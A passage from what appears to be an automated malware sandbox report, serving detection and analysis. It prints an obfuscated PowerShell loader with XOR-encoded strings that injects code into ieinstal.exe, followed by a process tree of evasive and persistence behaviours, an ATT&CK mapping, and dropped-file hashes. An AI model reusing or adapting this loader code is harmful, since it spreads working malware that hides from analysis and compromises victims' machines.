ADFV8TBD8CD A 2 D 3pD FAA 4 B 6 9 1S8 BPAFF 8 B 8SDLAO2 D 6NDAF Da7LAf4MBU6B9K1B8 BSAPF 8SBR8 DnAE2EDC6TD 6ADK6P' ; & (O`$DMSa d rSiulGeSn eK7R)E `$ MMabnNiBaBbDlGe 2S;S`$KMSaFnSi aRb l eD3C =S A aHrKeRtBs 1P1A8U0I H'SDSBMBDAM9C3 9FAM9FCs8GBA8RD 9K0 9W3U8S6C8C5 9ME 8 BJ9S6 9 0p9H1ODA1NB 6 9L1E8 9G9D0K9 4 9KAnDG7UD B AVF 9B6B9RA 8UBS9SAT8AD 8pC CRC DD3 DDB BD3U9U1 8 BC8ADA8R6n9 4 9 4 9 A 8FDTD 3 D BSACBP8IA 8 DP9s1 9RAB8SB 9PA 9AE 8BB 9 AF8ND D 3ACJFpDt3HC FsD 6P'N;G& (p`$VMFa d rai l e n e 7 )L F`$TMKaAn i a b l eP3M# ;""";;Function Maniable9 { param([String]$Tilkbt); For($Farewells156=1; $Farewells156 -lt $Tilkbt.Length-1; $Farewells156+=(1+1)){ $Aarets118 = $Aarets118 + $Tilkbt.Substring($Farewells156, 1); } $Aarets118;}$Vsensforskellig0 = Maniable9 ' Z S U G R K S I G C D P R b e I ECXF ';$Vsensforskellig1= Maniable9 $Barbarianism;if([IntPtr]::size -eq 4+4){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Vsensforskellig1 ;}else{.$Vsensforskellig0 $Vsensforskellig1;}"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1196
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Aarets1180 { param([String]$Tilkbt); $Unwilier = New-Object byte[] ($Tilkbt.Length / 2); For($Farewells156=0; $Farewells156 -lt $Tilkbt.Length; $Farewells156+=2){ $Vinasse = $Tilkbt.Substring($Farewells156, 2); $Unwilier[$Farewells156/2] = [convert]::ToByte($Vinasse, 16); $Unwilier[$Farewells156/2] = ($Unwilier[$Farewells156/2] -bxor 255); } [String][System.Text.Encoding]::ASCII.GetString($Unwilier);}$Snuggies0=Aarets1180 'AC868C8B9A92D19B9393';$Snuggies1=Aarets1180 'B2969C8D908C90998BD1A89691CCCDD1AA918C9E999AB19E8B96899AB29A8B97909B8C';$Snuggies2=Aarets1180 'B89A8BAF8D909CBE9B9B8D9A8C8C';$Snuggies3=Aarets1180 'AC868C8B9A92D1AD8A918B96929AD1B6918B9A8D908FAC9A8D89969C9A8CD1B79E919B939AAD9A99';$Snuggies4=Aarets1180 '8C8B8D969198';$Snuggies5=Aarets1180 'B89A8BB2909B8A939AB79E919B939A';$Snuggies6=Aarets1180 'ADABAC8F9A9C969E93B19E929AD3DFB7969B9ABD86AC9698D3DFAF8A9D93969C';$Snuggies7=Aarets1180 'AD8A918B96929AD3DFB29E919E989A9B';$Snuggies8=Aarets1180 'AD9A99939A9C8B9A9BBB9A939A989E8B9A';$Snuggies9=Aarets1180 'B691B29A92908D86B2909B8A939A';$Madrilene0=Aarets1180 'B286BB9A939A989E8B9AAB868F9A';$Madrilene1=Aarets1180 'BC939E8C8CD3DFAF8A9D93969CD3DFAC9A9E939A9BD3DFBE918C96BC939E8C8CD3DFBE8A8B90BC939E8C8C';$Madrilene2=Aarets1180 'B6918990949A';$Madrilene3=Aarets1180 'AF8A9D93969CD3DFB7969B9ABD86AC9698D3DFB19A88AC93908BD3DFA9968D8B8A9E93';$Madrilene4=Aarets1180 'A9968D8B8A9E93BE9393909C';$Madrilene5=Aarets1180 '918B9B9393';$Madrilene6=Aarets1180 'B18BAF8D908B9A9C8BA9968D8B8A9E93B29A92908D86';$Madrilene7=Aarets1180 'B6BAA7';$Madrilene8=Aarets1180 'A3';$Allegoriers=Aarets1180 'AAACBAADCCCD';$Megger=Aarets1180 'BC9E9393A896919B9088AF8D909CBE';function fkp {Param ($Talcum, $Aristokrats) ;$Rauno0 =Aarets1180 'DBB79E928D969198CEC6CCDFC2DFD7A4BE8F8FBB90929E9691A2C5C5BC8A8D8D9A918BBB90929E9691D1B89A8BBE8C8C9A929D93969A8CD7D6DF83DFA8979A8D9AD2B09D959A9C8BDF84DFDBA0D1B893909D9E93BE8C8C9A929D9386BC9E9C979ADFD2BE919BDFDBA0D1B3909C9E8B969091D1AC8F93968BD7DBB29E9B8D96939A919AC7D6A4D2CEA2D1BA8E8A9E938CD7DBAC918A9898969A8CCFD6DF82D6D1B89A8BAB868F9AD7DBAC918A9898969A8CCED6';&($Madrilene7) $Rauno0;$Rauno5 = Aarets1180 'DBB4939E899A8D8CDFC2DFDBB79E928D969198CEC6CCD1B89A8BB29A8B97909BD7DBAC918A9898969A8CCDD3DFA4AB868F9AA4A2A2DFBFD7DBAC918A9898969A8CCCD3DFDBAC918A9898969A8CCBD6D6';&($Madrilene7) $Rauno5;$Rauno1 = Aarets1180 '8D9A8B8A8D91DFDBB4939E899A8D8CD1B6918990949AD7DB918A9393D3DFBFD7A4AC868C8B9A92D1AD8A918B96929AD1B6918B9A8D908FAC9A8D89969C9A8CD1B79E919B939AAD9A99A2D7B19A88D2B09D959A9C8BDFAC868C8B9A92D1AD8A918B96929AD1B6918B9A8D908FAC9A8D89969C9A8CD1B79E919B939AAD9A99D7D7B19A88D2B09D959A9C8BDFB6918BAF8B8DD6D3DFD7DBB79E928D969198CEC6CCD1B89A8BB29A8B97909BD7DBAC918A9898969A8CCAD6D6D1B6918990949AD7DB918A9393D3DFBFD7DBAB9E939C8A92D6D6D6D6D3DFDBBE8D968C8B90948D9E8B8CD6D6';&($Madrilene7) $Rauno1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $forkbsrettigheder,[Parameter(Position = 1)] [Type] $Overskrivfunktions = [Void]);$Rauno2 = Aarets1180 'DBAB9A8D8D908D96859A8D8CDFC2DFA4BE8F8FBB90929E9691A2C5C5BC8A8D8D9A918BBB90929E9691D1BB9A9996919ABB86919E92969CBE8C8C9A929D9386D7D7B19A88D2B09D959A9C8BDFAC868C8B9A92D1AD9A99939A9C8B969091D1BE8C8C9A929D9386B19E929AD7DBAC918A9898969A8CC7D6D6D3DFA4AC868C8B9A92D1AD9A99939A9C8B969091D1BA92968BD1BE8C8C9A929D9386BD8A96939B9A8DBE9C9C9A8C8CA2C5C5AD8A91D6D1BB9A9996919ABB86919E92969CB2909B8A939AD7DBAC918A9898969A8CC6D3DFDB999E938C9AD6D1BB9A9996919AAB868F9AD7DBB29E9B8D96939A919ACFD3DFDBB29E9B8D96939A919ACED3DFA4AC868C8B9A92D1B28A938B969C9E8C8BBB9A939A989E8B9AA2D6';&($Madrilene7) $Rauno2;$Rauno3 = Aarets1180 'DBAB9A8D8D908D96859A8D8CD1BB9A9996919ABC90918C8B8D8A9C8B908DD7DBAC918A9898969A8CC9D3DFA4AC868C8B9A92D1AD9A99939A9C8B969091D1BC9E9393969198BC9091899A918B9690918CA2C5C5AC8B9E919B9E8D9BD3DFDB99908D949D8C8D9A8B8B9698979A9B9A8DD6D1AC9A8BB6928F939A929A918B9E8B969091B9939E988CD7DBAC918A9898969A8CC8D6';&($Madrilene7) $Rauno3;$Rauno4 = Aarets1180 'DBAB9A8D8D908D96859A8D8CD1BB9A9996919AB29A8B97909BD7DBB29E9B8D96939A919ACDD3DFDBB29E9B8D96939A919ACCD3DFDBB0899A8D8C948D9689998A91948B9690918CD3DFDB99908D949D8C8D9A8B8B9698979A9B9A8DD6D1AC9A8BB6928F939A929A918B9E8B969091B9939E988CD7DBAC918A9898969A8CC8D6';&($Madrilene7) $Rauno4;$Rauno5 = Aarets1180 '8D9A8B8A8D91DFDBAB9A8D8D908D96859A8D8CD1BC8D9A9E8B9AAB868F9AD7D6';&($Madrilene7) $Rauno5 ;}$Leucins = Aarets1180 '949A8D919A93CCCD';$Rauno6 = Aarets1180 'DBAF97868B9091CAC9DFC2DFA4AC868C8B9A92D1AD8A918B96929AD1B6918B9A8D908FAC9A8D89969C9A8CD1B29E8D8C979E93A2C5C5B89A8BBB9A939A989E8B9AB9908DB98A919C8B969091AF9096918B9A8DD7D799948FDFDBB39A8A9C96918CDFDBB29E9B8D96939A919ACBD6D3DFD7B8BBABDFBFD7A4B6918BAF8B8DA2D3DFA4AAB6918BCCCDA2D3DFA4AAB6918BCCCDA2D3DFA4AAB6918BCCCDA2D6DFD7A4B6918BAF8B8DA2D6D6D6';&($Madrilene7) $Rauno6;$Turneteater = fkp $Madrilene5 $Madrilene6;$Rauno7 = Aarets1180 'DBAF969A8B9A8D8CCCDFC2DFDBAF97868B9091CAC9D1B6918990949AD7A4B6918BAF8B8DA2C5C5A59A8D90D3DFC9C9CCD3DFCF87CCCFCFCFD3DFCF87CBCFD6';&($Madrilene7) $Rauno7;$Rauno8 = Aarets1180 'DBB3918B8D8694949A8DDFC2DFDBAF97868B9091CAC9D1B6918990949AD7A4B6918BAF8B8DA2C5C5A59A8D90D3DFCDCECFCFCFCEC6CDD3DFCF87CCCFCFCFD3DFCF87CBD6';&($Madrilene7) $Rauno8;$Pieters00='HKCU:\Extramission\Basiate';$Pieters01 =Aarets1180 'DBB29E91969E9D939AC2D7B89A8BD2B68B9A92AF8D908F9A8D8B86DFD2AF9E8B97DFDBAF969A8B9A8D8CCFCFD6D1AD969B989A938CCEC9C8';&($Madrilene7) $Pieters01;$Rauno9 = Aarets1180 'DBAD9E8A9190DFC2DFA4AC868C8B9A92D1BC9091899A8D8BA2C5C5B98D9092BD9E8C9AC9CBAC8B8D969198D7DBB29E91969E9D939AD6';&($Madrilene7) $Rauno9;$Maniable0 = Aarets1180 'A4AC868C8B9A92D1AD8A918B96929AD1B6918B9A8D908FAC9A8D89969C9A8CD1B29E8D8C979E93A2C5C5BC908F86D7DBAD9E8A9190D3DFCFD3DFDFDBAF969A8B9A8D8CCCD3DFC9C9CCD6';&($Madrilene7) $Maniable0;$Feltflaskernes198=$Rauno.count-663;$Maniable1 = Aarets1180 'A4AC868C8B9A92D1AD8A918B96929AD1B6918B9A8D908FAC9A8D89969C9A8CD1B29E8D8C979E93A2C5C5BC908F86D7DBAD9E8A9190D3DFC9C9CCD3DFDBB3918B8D8694949A8DD3DFDBB99A938B99939E8C949A8D919A8CCEC6C7D6';&($Madrilene7) $Maniable1;$Maniable2 = Aarets1180 'DBBA939A9C8B8D909386859E8B969091DFC2DFA4AC868C8B9A92D1AD8A918B96929AD1B6918B9A8D908FAC9A8D89969C9A8CD1B29E8D8C979E93A2C5C5B89A8BBB9A939A989E8B9AB9908DB98A919C8B969091AF9096918B9A8DD7D799948FDFDBBE93939A98908D969A8D8CDFDBB29A98989A8DD6D3DFD7B8BBABDFBFD7A4B6918BAF8B8DA2D3DFA4B6918BAF8B8DA2D3DFA4B6918BAF8B8DA2D3DFA4B6918BAF8B8DA2D3DFA4B6918BAF8B8DA2D6DFD7A4B6918BAF8B8DA2D6D6D6';&($Madrilene7) $Maniable2;$Maniable3 = Aarets1180 'DBBA939A9C8B8D909386859E8B969091D1B6918990949AD7DBAF969A8B9A8D8CCCD3DBB3918B8D8694949A8DD3DBAB8A8D919A8B9A9E8B9A8DD3CFD3CFD6';&($Madrilene7) $Maniable3#"
      4⤵
      Checks QEMU agent file
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:924
    - - C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        5⤵
        Checks QEMU agent file
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of AdjustPrivilegeToken
        
        PID:2012
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\SysWOW64\cmd.exe"
  2⤵
  - Adds policy Run key to start application
  - Blocklisted process makes network request
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - Modifies Internet Explorer settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1552
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:1440

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
61KB

MD5
e71c8443ae0bc2e282c73faead0a6dd3

SHA1
0c110c1b01e68edfacaeae64781a37b1995fa94b

SHA256
95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72

SHA512
b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
10c9891bfca6e69cca58940a4a268a9e

SHA1
ae32583e4d536402dbf34d5db1c9a2e213c1df99

SHA256
c7e8da30f65490d5b6516a07d5c7337500aa3358119eb89bac347b7985c89bd2

SHA512
570de2c39fcc9efde4dd459741e175f3dd29b3521ac3d2517771b7e10a0dd47d0101c0a0264e603d0122d3c64c7a6dbe906ae535ef403d510fd8cf5b682eacd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabEA12.tmp

Filesize
61KB

MD5
e71c8443ae0bc2e282c73faead0a6dd3

SHA1
0c110c1b01e68edfacaeae64781a37b1995fa94b

SHA256
95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72

SHA512
b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\ebuxshgp.zip

Filesize
542KB

MD5
a9a3b70adcf65be80c9b00e65d158669

SHA1
f2149444f70b702a43ad1e058dea147d6ba2eb5d

SHA256
bdcd90d909c708eff9a829c01b428c2b24fafc15f63deccd064c2bb12b0a49e3

SHA512
e06ea8f9d982ecd5bedf23676fa41b49d8673d9135f752655210c322529fb1441a4ef5f292825eea11ccb0cb516e873c33d16c3f800204511639c5b8db429290

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\INFK9TXDBLERVR98M9IA.temp

Filesize
7KB

MD5
5e9df5fce09664a53601baa4b141fe6a

SHA1
465f65c0b498a0a793ab2a8f76239048fed1d755

SHA256
bb252b0bd8366a3544b9695541e0435277ab553cf7271ee490281756248b9031

SHA512
b075945671d1fd0c39daa02ec39b93c9ad8a83f105fdec0f9c0682a4afa454187a6084523719eb9a4f8ea3593b849774c574d4cb1b6b2ba4f6ef59a0b42f670f

Download Submit
\Users\Admin\AppData\Local\Temp\sqlite3.dll

Filesize
1.0MB

MD5
ce5c15b5092877974d5b6476ad1cb2d7

SHA1
76a6fc307d1524081cba1886d312df97c9dd658f

SHA256
1f1a186ea26bd2462ea2a9cf35a816b92caf0897fdf332af3a61569e0ba97b24

SHA512
bb9ced38c63d2a29e18c38f60020cfdf0161384cd4ad6328352626643becdf49f6b4bef47012391720344fdd8ad520aa802dcbbed15b5026d27eb93b0a839c90

Download Submit
memory/924-91-0x0000000002380000-0x00000000023C0000-memory.dmp

Filesize
256KB

Download
memory/924-82-0x0000000002380000-0x00000000023C0000-memory.dmp

Filesize
256KB

Download
memory/924-84-0x0000000002380000-0x00000000023C0000-memory.dmp

Filesize
256KB

Download
memory/924-85-0x0000000005CF0000-0x00000000070F7000-memory.dmp

Filesize
20.0MB

Download
memory/924-86-0x0000000004F80000-0x0000000004F81000-memory.dmp

Filesize
4KB

Download
memory/924-83-0x0000000002380000-0x00000000023C0000-memory.dmp

Filesize
256KB

Download
memory/924-93-0x0000000002380000-0x00000000023C0000-memory.dmp

Filesize
256KB

Download
memory/924-92-0x0000000002380000-0x00000000023C0000-memory.dmp

Filesize
256KB

Download
memory/1196-87-0x0000000002450000-0x00000000024D0000-memory.dmp

Filesize
512KB

Download
memory/1196-90-0x0000000002450000-0x00000000024D0000-memory.dmp

Filesize
512KB

Download
memory/1196-89-0x0000000002450000-0x00000000024D0000-memory.dmp

Filesize
512KB

Download
memory/1196-88-0x0000000002450000-0x00000000024D0000-memory.dmp

Filesize
512KB

Download
memory/1196-81-0x0000000002450000-0x00000000024D0000-memory.dmp

Filesize
512KB

Download
memory/1196-78-0x0000000002450000-0x00000000024D0000-memory.dmp

Filesize
512KB

Download
memory/1196-75-0x000000001B290000-0x000000001B572000-memory.dmp

Filesize
2.9MB

Download
memory/1196-77-0x0000000002450000-0x00000000024D0000-memory.dmp

Filesize
512KB

Download
memory/1196-76-0x00000000022E0000-0x00000000022E8000-memory.dmp

Filesize
32KB

Download
memory/1372-129-0x0000000004BE0000-0x0000000004C96000-memory.dmp

Filesize
728KB

Download
memory/1372-322-0x00000000064F0000-0x0000000006593000-memory.dmp

Filesize
652KB

Download
memory/1372-137-0x00000000064F0000-0x0000000006593000-memory.dmp

Filesize
652KB

Download
memory/1372-136-0x0000000003670000-0x0000000003770000-memory.dmp

Filesize
1024KB

Download
memory/1552-132-0x000000004A7D0000-0x000000004A81C000-memory.dmp

Filesize
304KB

Download
memory/1552-348-0x0000000061E00000-0x0000000061EED000-memory.dmp

Filesize
948KB

Download
memory/1552-139-0x0000000001D10000-0x0000000001D9F000-memory.dmp

Filesize
572KB

Download
memory/1552-135-0x0000000001EC0000-0x00000000021C3000-memory.dmp

Filesize
3.0MB

Download
memory/1552-131-0x000000004A7D0000-0x000000004A81C000-memory.dmp

Filesize
304KB

Download
memory/1552-134-0x0000000000080000-0x00000000000AD000-memory.dmp

Filesize
180KB

Download
memory/2012-127-0x000000001DDA0000-0x000000001E0A3000-memory.dmp

Filesize
3.0MB

Download
memory/2012-130-0x0000000001250000-0x0000000002657000-memory.dmp

Filesize
20.0MB

Download
memory/2012-98-0x0000000001250000-0x0000000002657000-memory.dmp

Filesize
20.0MB

Download
memory/2012-128-0x0000000000250000-0x0000000000260000-memory.dmp

Filesize
64KB

Download
memory/2012-122-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/2012-126-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/2012-95-0x0000000001250000-0x0000000002657000-memory.dmp

Filesize
20.0MB

Download
memory/2012-94-0x0000000001250000-0x0000000002657000-memory.dmp

Filesize
20.0MB

Download
memory/2012-124-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/2012-123-0x0000000001250000-0x0000000002657000-memory.dmp

Filesize
20.0MB

Download